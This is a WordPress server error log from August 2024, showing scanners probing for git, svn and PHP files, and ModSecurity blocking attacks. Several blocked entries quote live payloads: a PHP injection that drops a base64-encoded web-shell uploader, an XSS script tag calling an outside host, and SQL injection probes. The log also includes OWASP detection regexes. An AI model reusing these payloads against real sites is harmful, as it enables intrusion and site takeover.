[autoindex:error] [pid 16140:tid 140186759444224] [client 108.165.243.129:36958] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Mon Aug 26 12:44:50.890023 2024] [autoindex:error] [pid 5530:tid 140186751051520] [client 108.165.243.129:36962] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php [Mon Aug 26 17:31:22.288614 2024] [:error] [pid 4901:tid 140186675517184] [client 34.175.202.163:42566] [client 34.175.202.163] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zs0COhCs06GfKstKOu1FvQAAABA"], referer: www.google.com [Mon Aug 26 17:31:28.288817 2024] [:error] [pid 4902:tid 140186625160960] [client 34.175.202.163:42568] [client 34.175.202.163] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at REQUEST_COOKIES:14[47]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fopen found within REQUEST_COOKIES:14[47]: fopen"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-catcher/index.php"] [unique_id "Zs0CQL7s797OGUZWUVnY9AAAAFY"], referer: www.google.com [Wed Aug 28 11:29:07.521971 2024] [authz_core:error] [pid 11028:tid 140468465669888] [client 96.126.110.74:55928] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/28 11:29:11 [error] 10318#10318: *36663 access forbidden by rule, client: 96.126.110.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Aug 28 14:49:41.915891 2024] [authz_core:error] [pid 11028:tid 140468322993920] [client 209.97.180.8:59486] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/28 14:49:47 [error] 10319#10319: *38401 access forbidden by rule, client: 209.97.180.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Aug 28 16:13:03.084327 2024] [:error] [pid 10358:tid 140468373350144] [client 52.164.231.122:60592] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/afnew.php [Wed Aug 28 16:13:20.589645 2024] [autoindex:error] [pid 10360:tid 140468356564736] [client 52.164.231.122:60626] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Aug 28 16:13:37.929269 2024] [autoindex:error] [pid 10359:tid 140468406920960] [client 52.164.231.122:60666] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Aug 28 16:13:39.871556 2024] [autoindex:error] [pid 11028:tid 140468516026112] [client 52.164.231.122:60676] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Aug 28 16:13:40.868164 2024] [:error] [pid 11028:tid 140468348172032] [client 52.164.231.122:60680] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Aug 28 16:13:44.173136 2024] [:error] [pid 10359:tid 140468482455296] [client 52.164.231.122:60688] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/autoload_classmap.php [Wed Aug 28 16:13:59.618739 2024] [autoindex:error] [pid 11028:tid 140468398528256] [client 52.164.231.122:60724] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Aug 28 16:13:59.682375 2024] [:error] [pid 10360:tid 140468415313664] [client 52.164.231.122:60726] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Wed Aug 28 16:14:00.845386 2024] [:error] [pid 10359:tid 140468381742848] [client 52.164.231.122:60730] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/makeasmtp.php [Wed Aug 28 16:14:24.171810 2024] [:error] [pid 11028:tid 140468423706368] [client 52.164.231.122:60784] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Aug 28 16:14:27.311079 2024] [:error] [pid 10359:tid 140468339779328] [client 52.164.231.122:60792] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/radio.php [Wed Aug 28 16:14:33.105627 2024] [:error] [pid 10358:tid 140468381742848] [client 52.164.231.122:60804] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-config.php [Wed Aug 28 16:14:42.327289 2024] [autoindex:error] [pid 11028:tid 140468457277184] [client 52.164.231.122:60832] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Aug 28 16:14:49.236527 2024] [:error] [pid 11028:tid 140468398528256] [client 52.164.231.122:60856] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Wed Aug 28 16:15:10.345370 2024] [:error] [pid 10360:tid 140468457277184] [client 52.164.231.122:60906] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Wed Aug 28 16:15:26.475810 2024] [:error] [pid 11028:tid 140468356564736] [client 52.164.231.122:60938] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Aug 28 16:15:26.539592 2024] [:error] [pid 10359:tid 140468390135552] [client 52.164.231.122:60940] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Aug 28 16:16:07.581204 2024] [autoindex:error] [pid 10358:tid 140468457277184] [client 52.164.231.122:32812] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Aug 28 16:16:16.807014 2024] [autoindex:error] [pid 11028:tid 140468415313664] [client 52.164.231.122:32836] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Aug 28 16:16:17.639419 2024] [autoindex:error] [pid 11028:tid 140468448884480] [client 52.164.231.122:32840] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Aug 28 16:16:19.623935 2024] [:error] [pid 11028:tid 140468432099072] [client 52.164.231.122:32846] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Aug 28 16:16:19.687981 2024] [:error] [pid 11028:tid 140468356564736] [client 52.164.231.122:32848] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Aug 28 22:23:01.875574 2024] [:error] [pid 11028:tid 140468381742848] [client 41.216.188.18:37558] [client 41.216.188.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:google: echo 'RxRHaCk';fwrite(fopen('../about.php','w+'),base64_decode('PD9waHAgCmVycm9yX3JlcG9ydGluZyhFX0VSUk9SIHwgRV9QQVJTRSk7CmlmICgkX0dFVFsia2V5Il0gPT0gIkVuaWdtYUN5YmVyU2VjdXJpdHkiKXsKZWNobyAiPGI+RW5pZ21hQ3liZXJTZWN1cml0eTwvYj48YnI+IjsKZWNobyAnPGI+U3lzdGVtIEluZm86PC9iPiAnLnBocF91bmFtZSgpOwplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOwplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZm..."] [severity "CR [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Zs_plS7bhZovhErhJmYaLgAAANA"] [Wed Aug 28 22:23:08.935929 2024] [:error] [pid 11028:tid 140468507633408] [client 41.216.188.18:37566] [client 41.216.188.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:google: echo 'RxRHaCk';fwrite(fopen('../about.php','w+'),base64_decode('PD9waHAgCmVycm9yX3JlcG9ydGluZyhFX0VSUk9SIHwgRV9QQVJTRSk7CmlmICgkX0dFVFsia2V5Il0gPT0gIkVuaWdtYUN5YmVyU2VjdXJpdHkiKXsKZWNobyAiPGI+RW5pZ21hQ3liZXJTZWN1cml0eTwvYj48YnI+IjsKZWNobyAnPGI+U3lzdGVtIEluZm86PC9iPiAnLnBocF91bmFtZSgpOwplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOwplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZm..."] [severity "CR [hostname "investigacionperu.com"] [uri "/wp-content/plugins/about.php"] [unique_id "Zs_pnC7bhZovhErhJmYaLwAAAME"] [Wed Aug 28 22:23:16.105780 2024] [:error] [pid 10360:tid 140468482455296] [client 41.216.188.18:37570] [client 41.216.188.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:css: echo 'RxRHaCk';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAgCmVycm9yX3JlcG9ydGluZyhFX0VSUk9SIHwgRV9QQVJTRSk7CmlmICgkX0dFVFsia2V5Il0gPT0gIkVuaWdtYUN5YmVyU2VjdXJpdHkiKXsKZWNobyAiPGI+RW5pZ21hQ3liZXJTZWN1cml0eTwvYj48YnI+IjsKZWNobyAnPGI+U3lzdGVtIEluZm86PC9iPiAnLnBocF91bmFtZSgpOwplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOwplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSI..."] [severity "CRITI [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "Zs_ppPv56Bgi9Nokh_habAAAAIQ"] [Wed Aug 28 22:23:23.086082 2024] [:error] [pid 10359:tid 140468322993920] [client 41.216.188.18:37574] [client 41.216.188.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:css: echo 'RxRHaCk';fwrite(fopen('/about.php','w+'),base64_decode('PD9waHAgCmVycm9yX3JlcG9ydGluZyhFX0VSUk9SIHwgRV9QQVJTRSk7CmlmICgkX0dFVFsia2V5Il0gPT0gIkVuaWdtYUN5YmVyU2VjdXJpdHkiKXsKZWNobyAiPGI+RW5pZ21hQ3liZXJTZWN1cml0eTwvYj48YnI+IjsKZWNobyAnPGI+U3lzdGVtIEluZm86PC9iPiAnLnBocF91bmFtZSgpOwplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOwplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSI..."] [severity "CRITI [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "Zs_pq1aQ66wpEPluE8BigwAAAFc"] [Thu Aug 29 00:43:00.561131 2024] [ssl:warn] [pid 10338:tid 140468771735424] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/08/29 00:43:01 [error] 10319#10319: *43238 access forbidden by rule, client: 159.65.18.197, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/08/29 00:43:02 [error] 21584#21584: *43266 access forbidden by rule, client: 206.81.24.74, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/08/29 00:43:05 [error] 21586#21586: *43410 access forbidden by rule, client: 157.230.19.140, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/08/29 00:43:05 [error] 21586#21586: *43412 access forbidden by rule, client: 64.226.65.160, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/08/29 00:43:06 [error] 21586#21586: *43433 access forbidden by rule, client: 209.38.208.202, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Thu Aug 29 03:31:36.180804 2024] [ssl:warn] [pid 12096:tid 139741768136576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Aug 29 03:31:36.435088 2024] [ssl:warn] [pid 12097:tid 139741768136576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Aug 29 03:31:36.923871 2024] [ssl:warn] [pid 12097:tid 139741768136576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Aug 29 03:31:39.123826 2024] [ssl:warn] [pid 12097:tid 139741768136576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Aug 29 03:31:41.532022 2024] [ssl:warn] [pid 12516:tid 140281982859136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Aug 29 03:31:41.816923 2024] [ssl:warn] [pid 12517:tid 140281982859136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Aug 29 03:31:42.860589 2024] [ssl:warn] [pid 12517:tid 140281982859136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/08/29 03:32:01 [error] 12634#12634: *46398 access forbidden by rule, client: 195.178.110.35, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/08/29 03:33:45 [error] 12633#12633: *46409 access forbidden by rule, client: 195.178.110.35, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/08/29 03:37:33 [error] 12633#12633: *46411 access forbidden by rule, client: 195.178.110.35, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/08/29 05:45:24 [error] 12634#12634: *47842 access forbidden by rule, client: 109.202.99.46, server: mail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "mail.investigacionperu.com" 2024/08/29 05:45:24 [error] 12634#12634: *47840 access forbidden by rule, client: 109.202.99.46, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" 2024/08/29 05:45:26 [error] 12633#12633: *47923 access forbidden by rule, client: 109.202.99.46, server: webmail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "webmail.investigacionperu.com" 2024/08/29 05:45:26 [error] 12633#12633: *47922 access forbidden by rule, client: 109.202.99.46, server: webmail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "webmail.investigacionperu.com" 2024/08/29 08:31:03 [error] 12633#12633: *50378 access forbidden by rule, client: 3.253.143.187, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Aug 29 11:39:31.189655 2024] [autoindex:error] [pid 12854:tid 140281774933760] [client 20.204.154.50:55542] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Aug 29 12:43:05.130819 2024] [:error] [pid 12856:tid 140281651377920] [client 179.43.191.18:56488] [client 179.43.191.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script> found within ARGS:result[_msg]: <script src=https://zeroday2024.com/admin-bar-reloaded.min.js></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZtCzKXwbawYlSWXox97OKQAAAUk"], referer: http://investigacionperu.com [Fri Aug 30 03:29:42.003160 2024] [ssl:warn] [pid 8230:tid 139674016003968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Aug 30 03:29:42.429937 2024] [ssl:warn] [pid 8231:tid 139674016003968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Aug 30 03:29:42.937387 2024] [ssl:warn] [pid 8231:tid 139674016003968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Aug 30 03:29:45.539166 2024] [ssl:warn] [pid 8231:tid 139674016003968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Aug 30 03:29:47.878068 2024] [ssl:warn] [pid 8653:tid 140590739629952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Aug 30 03:29:48.302295 2024] [ssl:warn] [pid 8654:tid 140590739629952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Aug 30 08:07:15.287605 2024] [autoindex:error] [pid 9366:tid 140590410868480] [client 154.38.180.34:45776] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Aug 30 12:33:56.474107 2024] [authz_core:error] [pid 9366:tid 140590540097280] [client 139.162.96.14:51340] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/30 12:34:02 [error] 8538#8538: *66173 access forbidden by rule, client: 139.162.96.14, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Aug 30 12:41:37.451181 2024] [authz_core:error] [pid 8676:tid 140590318548736] [client 165.227.173.41:51610] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/08/30 12:41:42 [error] 8538#8538: *66310 access forbidden by rule, client: 165.227.173.41, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Aug 31 01:17:50.656780 2024] [:error] [pid 9366:tid 140590394083072] [client 193.29.13.20:37612] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 2094= found within ARGS:ver: 1.8.5.47) AND 2094=5925 AND (1271=1271"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1jg1VuGGNTxm_kiOEmAAAAMs"] [Sat Aug 31 01:17:51.004734 2024] [:error] [pid 8675:tid 140590427653888] [client 193.29.13.20:37614] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "136"] [id "959072"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: AND 3137= found within ARGS:ver: 1.8.5.47) AND 3137=3137 AND (9870=9870"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1j5dLCjsWrLhZKAOZaAAAAEc"] [Sat Aug 31 01:17:51.328447 2024] [:error] [pid 8676:tid 140590310156032] [client 193.29.13.20:37616] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=]|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[<>]|\\\\band\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|\\\\b(?i:and)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')" at ARGS:ver. [file 